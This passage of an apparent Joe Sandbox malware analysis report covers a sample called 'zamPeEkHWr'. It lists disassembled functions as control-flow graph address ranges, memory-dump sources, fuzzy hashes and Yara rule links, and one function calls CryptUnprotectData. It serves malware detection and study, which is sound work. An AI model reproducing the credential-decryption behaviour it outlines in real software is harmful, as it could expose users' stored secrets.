                                                  control_flow_graph 272 7ffd9ba3c391-7ffd9ba3c3b2 275 7ffd9ba3c3b4-7ffd9ba3c3b8 272->275 276 7ffd9ba3c3ba-7ffd9ba3c3d1 272->276 275->276 277 7ffd9ba3c3d3-7ffd9ba3c411 276->277 278 7ffd9ba3c41b-7ffd9ba3c421 276->278 279 7ffd9ba3c424-7ffd9ba3c435 278->279 280 7ffd9ba3c423 278->280 282 7ffd9ba3c438-7ffd9ba3c449 279->282 283 7ffd9ba3c437 279->283 280->279 284 7ffd9ba3c44c-7ffd9ba3c45d 282->284 285 7ffd9ba3c44b 282->285 283->282 286 7ffd9ba3c460-7ffd9ba3c471 284->286 287 7ffd9ba3c45f 284->287 285->284 288 7ffd9ba3c474-7ffd9ba3c485 286->288 289 7ffd9ba3c473 286->289 287->286 290 7ffd9ba3c488-7ffd9ba3c499 288->290 291 7ffd9ba3c487 288->291 289->288 292 7ffd9ba3c49c-7ffd9ba3c4b7 290->292 293 7ffd9ba3c49b 290->293 291->290 294 7ffd9ba3c501-7ffd9ba3c516 292->294 295 7ffd9ba3c4b9-7ffd9ba3c4cf 292->295 293->292 296 7ffd9ba3c4d1-7ffd9ba3c4d4 295->296 297 7ffd9ba3c528-7ffd9ba3c53c 295->297 299 7ffd9ba3c4d6-7ffd9ba3c4dd 296->299 300 7ffd9ba3c555-7ffd9ba3c569 296->300 301 7ffd9ba3c53e-7ffd9ba3c553 297->301 302 7ffd9ba3c586 297->302 299->294 303 7ffd9ba3c5c2-7ffd9ba3c5c7 300->303 304 7ffd9ba3c56b-7ffd9ba3c56e 300->304 301->300 305 7ffd9ba3c5c8-7ffd9ba3c5ea 302->305 306 7ffd9ba3c588-7ffd9ba3c59b 302->306 303->305 307 7ffd9ba3c570-7ffd9ba3c572 304->307 308 7ffd9ba3c5ef-7ffd9ba3c5f3 304->308 311 7ffd9ba3c5ee 305->311 326 7ffd9ba3c5a2-7ffd9ba3c5a3 306->326 307->311 312 7ffd9ba3c574 307->312 314 7ffd9ba3c5f4-7ffd9ba3c5f5 308->314 315 7ffd9ba3c5f6-7ffd9ba3c5f9 308->315 311->308 316 7ffd9ba3c5b6-7ffd9ba3c5ba 312->316 317 7ffd9ba3c576-7ffd9ba3c578 312->317 314->315 319 7ffd9ba3c5fa-7ffd9ba3c5fe 315->319 321 7ffd9ba3c5bc-7ffd9ba3c5c0 316->321 317->314 322 7ffd9ba3c57a 317->322 320 7ffd9ba3c600-7ffd9ba3c605 319->320 323 7ffd9ba3c608-7ffd9ba3c643 320->323 324 7ffd9ba3c607 320->324 321->303 322->321 325 7ffd9ba3c57c-7ffd9ba3c57e 322->325 327 7ffd9ba3c795-7ffd9ba3c7b0 323->327 328 7ffd9ba3c649-7ffd9ba3c68f 323->328 324->323 325->319 329 7ffd9ba3c580 325->329 330 7ffd9ba3c5aa-7ffd9ba3c5b5 call 7ffd9ba3c5bc 326->330 331 7ffd9ba3c7b7-7ffd9ba3c7ca 327->331 350 7ffd9ba3c696-7ffd9ba3c69d call 7ffd9ba3b280 328->350 329->303 333 7ffd9ba3c582-7ffd9ba3c584 329->333 330->316 335 7ffd9ba3c808-7ffd9ba3c813 331->335 336 7ffd9ba3c7cc-7ffd9ba3c7d5 331->336 333->302 333->320 341 7ffd9ba3c726-7ffd9ba3c746 335->341 342 7ffd9ba3c819-7ffd9ba3c85d 335->342 338 7ffd9ba3c7e7-7ffd9ba3c7fe 336->338 339 7ffd9ba3c7d7-7ffd9ba3c7dd 336->339 338->335 348 7ffd9ba3c800-7ffd9ba3c801 338->348 339->338 341->331 349 7ffd9ba3c748-7ffd9ba3c783 341->349 348->335 355 7ffd9ba3c78c-7ffd9ba3c794 349->355 354 7ffd9ba3c6a2-7ffd9ba3c6e7 350->354 354->355 359 7ffd9ba3c6ed-7ffd9ba3c720 354->359 355->327 359->341 359->342
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ^3_H
                                                  • API String ID: 0-1772057725
                                                  • Opcode ID: 6c596761396f2aba1ad469f45104eb86eb8a8252f93c4131c89210b142dc4399
                                                  • Instruction ID: 5dcc24f229e465677550b90fd14dfa513654d0afa5c866b2fbd2d612b13d7398
                                                  • Opcode Fuzzy Hash: 6c596761396f2aba1ad469f45104eb86eb8a8252f93c4131c89210b142dc4399
                                                  • Instruction Fuzzy Hash: F9025831A0D78E4FDB65DF688C646B67BE1FF85310F0401BAE45DC71D2EA28A902C741
                                                  Function 00007FFD9B8C20D8 Relevance: 1.8, Strings: 1, Instructions: 538COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 363 7ffd9b8c20d8-7ffd9b8c361d 365 7ffd9b8c3627-7ffd9b8c3633 363->365 366 7ffd9b8c361f-7ffd9b8c3625 363->366 367 7ffd9b8c3636-7ffd9b8c372c call 7ffd9b8c20d0 call 7ffd9b8c23b0 365->367 366->367 373 7ffd9b8c3732-7ffd9b8c3736 367->373 374 7ffd9b8c3738-7ffd9b8c373a 373->374 375 7ffd9b8c374e-7ffd9b8c3753 373->375 374->375 376 7ffd9b8c373c-7ffd9b8c373f call 7ffd9b8c2140 374->376 377 7ffd9b8c3755-7ffd9b8c3764 call 7ffd9b8c2138 375->377 378 7ffd9b8c3783-7ffd9b8c378a 375->378 385 7ffd9b8c3744-7ffd9b8c374b 376->385 390 7ffd9b8c376a-7ffd9b8c377e 377->390 391 7ffd9b8c3ca4-7ffd9b8c3cb5 377->391 381 7ffd9b8c378c-7ffd9b8c379e call 7ffd9b8c20e0 378->381 382 7ffd9b8c37a3-7ffd9b8c37ab 378->382 381->382 383 7ffd9b8c37ad-7ffd9b8c37b4 382->383 384 7ffd9b8c37e3-7ffd9b8c37e8 382->384 388 7ffd9b8c37c7-7ffd9b8c37ca call 7ffd9b8c2118 383->388 389 7ffd9b8c37b6-7ffd9b8c37c0 call 7ffd9b8c20f0 383->389 392 7ffd9b8c38d6-7ffd9b8c38e0 call 7ffd9b8c23f8 384->392 393 7ffd9b8c37ee-7ffd9b8c3819 384->393 385->375 401 7ffd9b8c37cf-7ffd9b8c37d1 388->401 389->384 407 7ffd9b8c37c2 389->407 390->378 396 7ffd9b8c3cc7-7ffd9b8c3cd8 391->396 397 7ffd9b8c3cb7-7ffd9b8c3cc2 call 7ffd9b8c20e0 391->397 392->373 409 7ffd9b8c38e6-7ffd9b8c38f0 call 7ffd9b8c2148 392->409 393->392 399 7ffd9b8c381f-7ffd9b8c3826 393->399 397->396 405 7ffd9b8c38cc-7ffd9b8c38d1 399->405 406 7ffd9b8c382c-7ffd9b8c3837 399->406 401->384 408 7ffd9b8c37d3-7ffd9b8c37dd call 7ffd9b8c2120 401->408 405->373 410 7ffd9b8c3839-7ffd9b8c384a 406->410 411 7ffd9b8c3850-7ffd9b8c3887 406->411 407->373 408->373 408->384 419 7ffd9b8c3900-7ffd9b8c390d 409->419 420 7ffd9b8c38f2-7ffd9b8c38fb 409->420 410->405 410->411 415 7ffd9b8c3889-7ffd9b8c388d 411->415 416 7ffd9b8c3893-7ffd9b8c38c1 411->416 415->416 416->405 421 7ffd9b8c3940-7ffd9b8c3942 419->421 422 7ffd9b8c390f-7ffd9b8c3916 419->422 420->373 426 7ffd9b8c394b 421->426 427 7ffd9b8c3944-7ffd9b8c3949 421->427 424 7ffd9b8c3918-7ffd9b8c3924 422->424 425 7ffd9b8c3926-7ffd9b8c3937 call 7ffd9b8c1150 422->425 424->425 428 7ffd9b8c3939-7ffd9b8c393b 424->428 425->421 425->428 431 7ffd9b8c394d-7ffd9b8c3955 426->431 427->431 428->373 433 7ffd9b8c3997-7ffd9b8c399a call 7ffd9b8c2150 431->433 434 7ffd9b8c3957-7ffd9b8c395e 431->434 438 7ffd9b8c399f-7ffd9b8c39a1 433->438 436 7ffd9b8c3960-7ffd9b8c396c 434->436 437 7ffd9b8c396e-7ffd9b8c397f call 7ffd9b8c1150 434->437 436->437 439 7ffd9b8c3990-7ffd9b8c3992 436->439 437->439 444 7ffd9b8c3981-7ffd9b8c398e call 7ffd9b8c1150 437->444 442 7ffd9b8c39ad-7ffd9b8c39af 438->442 443 7ffd9b8c39a3-7ffd9b8c39a8 438->443 439->373 445 7ffd9b8c39b5-7ffd9b8c39cf 442->445 446 7ffd9b8c3a3a-7ffd9b8c3a3e 442->446 443->373 444->433 444->439 450 7ffd9b8c39e3-7ffd9b8c39f0 445->450 451 7ffd9b8c39d1-7ffd9b8c39dd 445->451 448 7ffd9b8c3ac5-7ffd9b8c3ad0 446->448 449 7ffd9b8c3a44-7ffd9b8c3a5a 446->449 462 7ffd9b8c3c9d-7ffd9b8c3c9f 448->462 454 7ffd9b8c3a5c-7ffd9b8c3a68 449->454 455 7ffd9b8c3a6e-7ffd9b8c3a7b 449->455 456 7ffd9b8c39f2-7ffd9b8c39fd 450->456 457 7ffd9b8c3a31-7ffd9b8c3a38 450->457 451->450 454->455 459 7ffd9b8c3abc-7ffd9b8c3ac3 455->459 460 7ffd9b8c3a7d-7ffd9b8c3a88 455->460 458 7ffd9b8c3a03-7ffd9b8c3a2c 456->458 457->458 458->462 461 7ffd9b8c3a8e-7ffd9b8c3ab7 459->461 460->461 461->462 462->373
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: J_H
                                                  • API String ID: 0-326533465
                                                  • Opcode ID: 7c619d2275a4f8925c90b1cd1a7195a548c1b9607d28266559b899aea3eb538c
                                                  • Instruction ID: 4b96e56bfc4f489b9fc11423591c10edafa4d1a9ef7c29e33c8714305f45bb35
                                                  • Opcode Fuzzy Hash: 7c619d2275a4f8925c90b1cd1a7195a548c1b9607d28266559b899aea3eb538c
                                                  • Instruction Fuzzy Hash: FC022E70A19A498FEBA8EB58C4A5BB5B3E1FF58300F11417AD44EC32A1DE35F946CB41
                                                  Function 00007FFD9BA336AE Relevance: 1.7, APIs: 1, Instructions: 222encryptionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 469 7ffd9ba336ae-7ffd9ba33769 call 7ffd9ba325d0 483 7ffd9ba3376b 469->483 484 7ffd9ba3376c-7ffd9ba3377d 469->484 483->484 485 7ffd9ba3377f 484->485 486 7ffd9ba33780-7ffd9ba33841 CryptUnprotectData 484->486 485->486 488 7ffd9ba33843 486->488 489 7ffd9ba33849-7ffd9ba33878 486->489 488->489
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID: CryptDataUnprotect
                                                  • String ID:
                                                  • API String ID: 834300711-0
                                                  • Opcode ID: 3bd393ce48701cf141ae6f210bf9463ab1405fa8f0b53dcb4fe4d7008eb2c901
                                                  • Instruction ID: d2036f10a63c2cab7e638c5e2fa400f9f801a6ce72b82ac237f8a0a3923c4b5b
                                                  • Opcode Fuzzy Hash: 3bd393ce48701cf141ae6f210bf9463ab1405fa8f0b53dcb4fe4d7008eb2c901
                                                  • Instruction Fuzzy Hash: D8512970A1CB8D4FDB59EB6C9815AB97BE0FF59310F0041BEE44DC3293DA64A8458782
                                                  Function 00007FFD9BA33D4D Relevance: 1.4, Instructions: 1411COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5cef56485e167d56f357caec004e8db1d1fc2399f04bfa3d5491c184a59fae34
                                                  • Instruction ID: 77176bd1f71ba8e8d070721b9e8953220cc8172c73d45128c5f64379d25fd82a
                                                  • Opcode Fuzzy Hash: 5cef56485e167d56f357caec004e8db1d1fc2399f04bfa3d5491c184a59fae34
                                                  • Instruction Fuzzy Hash: FBB20771E0E38A4FE73D9B5884626E97BE0EF45304F05467ED48EC72B2DE74650A8782
                                                  Function 00007FFD9B8C2150 Relevance: .7, Instructions: 742COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c8fc0e912fe6f4a384afd84e1395bc765e2c4030d87fdeabc0926072797fe06
                                                  • Instruction ID: d51f4f2c3ad0dcd4f034b4994322e1025bc2aa315aef1b328c098a8ee1859fde
                                                  • Opcode Fuzzy Hash: 4c8fc0e912fe6f4a384afd84e1395bc765e2c4030d87fdeabc0926072797fe06
                                                  • Instruction Fuzzy Hash: 96329071718A0A4FDBACEB18D4A1A75B3E1FFA8300B1545AED04EC3696DE35F942C781
                                                  Function 00007FFD9BA4356A Relevance: .7, Instructions: 655COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 68911c07542bbf7b8dff6fce8e0d38f67d2dfb3b47589fb3bb4fe47794c9c4ef
                                                  • Instruction ID: d95df80b9875b6246d8a15b59c62e9a95b027b2fdd810bdb8d9de6a746d9e6c8
                                                  • Opcode Fuzzy Hash: 68911c07542bbf7b8dff6fce8e0d38f67d2dfb3b47589fb3bb4fe47794c9c4ef
                                                  • Instruction Fuzzy Hash: 4D126821B0EA4E0FE7B4EB78846567977D2EF49310F0501BDD48EC72E3DEA8A8468341
                                                  Function 00007FFD9BA3DCF2 Relevance: .5, Instructions: 492COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9c14ccfaefdf3850c334bf2179d1ca831c3b43aa9a9b6972970c9d40b2a66c1c
                                                  • Instruction ID: d30baa73b96cc375cfd53ed971c261b46f7263d6c5c6ebcd1fcbe691eb2eb3be
                                                  • Opcode Fuzzy Hash: 9c14ccfaefdf3850c334bf2179d1ca831c3b43aa9a9b6972970c9d40b2a66c1c
                                                  • Instruction Fuzzy Hash: AEF16930A09A4E8FE7A8EF6888646F97BE1FF59310F1502BDD05DC71E6CD69A906C740
                                                  Function 00007FFD9B88B835 Relevance: .4, Instructions: 368COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d15500e3434b4ac02df3099283bc3a8c9e510d880be8d98e8ce43f92cf024ad
                                                  • Instruction ID: fe0a3c4bb73bb332848cb3c73c734e113328d844a7471a5ca8b44337cda2456a
                                                  • Opcode Fuzzy Hash: 4d15500e3434b4ac02df3099283bc3a8c9e510d880be8d98e8ce43f92cf024ad
                                                  • Instruction Fuzzy Hash: 61A11571B0DA194BEB6CAB6CA8656B977C1EF99310F04017EE44EC32E3DD25A8428785
                                                  Function 00007FFD9BA3E377 Relevance: .3, Instructions: 336COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 21434d9f2348378e216ea491c0f03d8b7969ebf26ce18ad75ea4a95462fdf547
                                                  • Instruction ID: 8b44f1db8d5291c517c70f14ae4892b7fa8876adb4815cbb3d16dcbdc3bd6098
                                                  • Opcode Fuzzy Hash: 21434d9f2348378e216ea491c0f03d8b7969ebf26ce18ad75ea4a95462fdf547
                                                  • Instruction Fuzzy Hash: 3FB1473550E6CD4FD7629B749C206E67FA4EF47324F0501BBE098C70E3E9691A1AC7A2
                                                  Function 00007FFD9BA467E1 Relevance: .3, Instructions: 329COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 81e0569318f1beb0d099c2e3b20d89c6aa5be57efdbff2d79ac488f0e267506d
                                                  • Instruction ID: 8a427519a80250cfc6f6714e2248f1dea97fcb01a95a4f4c07969173a69a14ac
                                                  • Opcode Fuzzy Hash: 81e0569318f1beb0d099c2e3b20d89c6aa5be57efdbff2d79ac488f0e267506d
                                                  • Instruction Fuzzy Hash: 32A15831A0E68D4FE7659B6C88256F97BE2EF46310F0501BAD49CC71E3DEA86906C741
                                                  Function 00007FFD9BA45C81 Relevance: .3, Instructions: 329COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 78d15e24794e38c75a05baae496de02028e6f8694af46df6bac6092489b5ff77
                                                  • Instruction ID: 6f9e2f88ff66aafac93fefb24a26ce9ec0e90a685798b76409f94298cdd97232
                                                  • Opcode Fuzzy Hash: 78d15e24794e38c75a05baae496de02028e6f8694af46df6bac6092489b5ff77
                                                  • Instruction Fuzzy Hash: B8B1F43290E7CA5FD36757B45C250E57FA1EF43220B0A41FBD0D8CB4E3DA48590A8392
                                                  Function 00007FFD9BA40646 Relevance: .3, Instructions: 315COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e6330afe165844d201c3d1cf1fd516d59afcb842badbec029bd57899dccf83e
                                                  • Instruction ID: cce1785d3c5fd1c0a7ed33aabb993d1d54c843163b87d696d71b06acc4653685
                                                  • Opcode Fuzzy Hash: 9e6330afe165844d201c3d1cf1fd516d59afcb842badbec029bd57899dccf83e
                                                  • Instruction Fuzzy Hash: 3AA1A431B1D90D8FEBB8EB6C9865A7877E2EF98700F060179E40EC32E2DD64AD419745
                                                  Function 00007FFD9BA33200 Relevance: .3, Instructions: 295COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f4e4a4686c1145e861bfaf604aba691f63f2fc24f4b04989e135f7dab297bf45
                                                  • Instruction ID: 8ad875bbbf3503cb141a7c2d4cafa239ce959fe542f0852c9347de390cb9dc55
                                                  • Opcode Fuzzy Hash: f4e4a4686c1145e861bfaf604aba691f63f2fc24f4b04989e135f7dab297bf45
                                                  • Instruction Fuzzy Hash: 9E916B6260E7954FD717AB6C78764E63FE0DF4222870901FBE0888B0B7ED586906C391
                                                  Function 00007FFD9BA40300 Relevance: .3, Instructions: 284COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e6db3449bba52d71512e8662f2d4f34b2d2d9bbe52a9d5d5d0b898c8f1e7f469
                                                  • Instruction ID: 21ed394e784724e02d44c3f8abdb3ec1b4ac2a5ba191b110c2b6526174078006
                                                  • Opcode Fuzzy Hash: e6db3449bba52d71512e8662f2d4f34b2d2d9bbe52a9d5d5d0b898c8f1e7f469
                                                  • Instruction Fuzzy Hash: 5591F671F0D90E4BEB68DBA888657BC7BE2EFA8310F51017ED04DD3296DE686D468740
                                                  Function 00007FFD9BA33D61 Relevance: .3, Instructions: 257COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b6ef4a1e599a601f6b768f60f5e4eaae485e3656d54a1b88bcaf20cea6c10083
                                                  • Instruction ID: 10a8f3913ac016a4a2bb592ccfc471140cd1501826e1fb3ea664d6f5da7728a9
                                                  • Opcode Fuzzy Hash: b6ef4a1e599a601f6b768f60f5e4eaae485e3656d54a1b88bcaf20cea6c10083
                                                  • Instruction Fuzzy Hash: B5A13671E0E38A8FD7798FA484615E57BE0EF96310F0506BEC48D875B2DE78650ACB81
                                                  Function 00007FFD9B8AAFF0 Relevance: 1.8, Strings: 1, Instructions: 566COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 194 7ffd9b8aaff0-7ffd9b8ab049 195 7ffd9b8ab04b-7ffd9b8ab050 194->195 196 7ffd9b8ab05c-7ffd9b8ab06e 195->196 197 7ffd9b8ab052-7ffd9b8ab057 call 7ffd9b894c28 195->197 199 7ffd9b8ab070-7ffd9b8ab07b 196->199 200 7ffd9b8ab082-7ffd9b8ab0d9 196->200 197->196 199->195 203 7ffd9b8ab07d-7ffd9b8ab080 199->203 204 7ffd9b8ab3d9-7ffd9b8ab3ef 200->204 205 7ffd9b8ab0df-7ffd9b8ab0f1 200->205 203->200 217 7ffd9b8ab3f9-7ffd9b8ab44e 204->217 218 7ffd9b8ab3f1-7ffd9b8ab3f8 204->218 206 7ffd9b8ab0f7-7ffd9b8ab0ff 205->206 207 7ffd9b8ab1ed-7ffd9b8ab1f1 205->207 206->204 208 7ffd9b8ab105-7ffd9b8ab11d 206->208 210 7ffd9b8ab1f7-7ffd9b8ab201 207->210 211 7ffd9b8ab274-7ffd9b8ab27e 207->211 213 7ffd9b8ab1af-7ffd9b8ab1d2 208->213 214 7ffd9b8ab123-7ffd9b8ab154 208->214 210->204 212 7ffd9b8ab207-7ffd9b8ab218 210->212 215 7ffd9b8ab2a9-7ffd9b8ab2ac 211->215 216 7ffd9b8ab280-7ffd9b8ab290 call 7ffd9b894c48 211->216 219 7ffd9b8ab2af-7ffd9b8ab2be 212->219 213->204 222 7ffd9b8ab1d8-7ffd9b8ab1e7 213->222 220 7ffd9b8ab168-7ffd9b8ab1ad 214->220 221 7ffd9b8ab156-7ffd9b8ab166 214->221 215->219 233 7ffd9b8ab295-7ffd9b8ab2a2 216->233 241 7ffd9b8ab46b-7ffd9b8ab47c 217->241 242 7ffd9b8ab450-7ffd9b8ab456 217->242 218->217 219->204 224 7ffd9b8ab2c4-7ffd9b8ab2e2 219->224 220->213 232 7ffd9b8ab21d-7ffd9b8ab227 220->232 221->220 222->206 222->207 224->204 228 7ffd9b8ab2e8-7ffd9b8ab321 224->228 228->204 243 7ffd9b8ab327-7ffd9b8ab349 228->243 234 7ffd9b8ab229 232->234 235 7ffd9b8ab233-7ffd9b8ab243 232->235 233->215 234->235 235->204 238 7ffd9b8ab249-7ffd9b8ab273 235->238 247 7ffd9b8ab48d-7ffd9b8ab4b0 241->247 248 7ffd9b8ab47e-7ffd9b8ab48c 241->248 245 7ffd9b8ab458-7ffd9b8ab469 242->245 246 7ffd9b8ab4b1-7ffd9b8ab4f4 242->246 243->204 253 7ffd9b8ab34f-7ffd9b8ab361 243->253 245->241 245->242 259 7ffd9b8ab508-7ffd9b8ab515 246->259 260 7ffd9b8ab4f6-7ffd9b8ab501 246->260 248->247 255 7ffd9b8ab363-7ffd9b8ab36e 253->255 256 7ffd9b8ab3c4-7ffd9b8ab3d8 253->256 255->256 263 7ffd9b8ab370-7ffd9b8ab387 255->263 260->259 266 7ffd9b8ab398-7ffd9b8ab3bf call 7ffd9b894c48 263->266 267 7ffd9b8ab389-7ffd9b8ab394 263->267 266->256 267->266
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: d
                                                  • API String ID: 0-2564639436
                                                  • Opcode ID: 5251f34478d9c5e5287c3eea774f40fec5d2869a0a69146f00d8eea5e425f54a
                                                  • Instruction ID: 2c3bc9437797f19e40743b3de185ce74275eac2edf80d42b7323c4ac93f883a3
                                                  • Opcode Fuzzy Hash: 5251f34478d9c5e5287c3eea774f40fec5d2869a0a69146f00d8eea5e425f54a
                                                  • Instruction Fuzzy Hash: 0602F330619B498FD768DB58C4A1AB5B3E1FF98310F10467ED09EC36A6DA35F842CB81
                                                  Function 00007FFD9B8727BB Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: yV_H
                                                  • API String ID: 0-442952241
                                                  • Opcode ID: 8847a2b4a26748ed82cede5aa56f18177fdc37cee362f87def97e04fbf2571e6
                                                  • Instruction ID: 4657ea97743b632e9464398536ad4d069ae9bba674408e02843f5ae35fd8a6c1
                                                  • Opcode Fuzzy Hash: 8847a2b4a26748ed82cede5aa56f18177fdc37cee362f87def97e04fbf2571e6
                                                  • Instruction Fuzzy Hash: 7F81F932F1990D4BDBA4EB6C9891ABD73E1EFD9350F45017AE04DC3296EE34AD824781
                                                  Function 00007FFD9B87830B Relevance: 1.5, Strings: 1, Instructions: 250COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
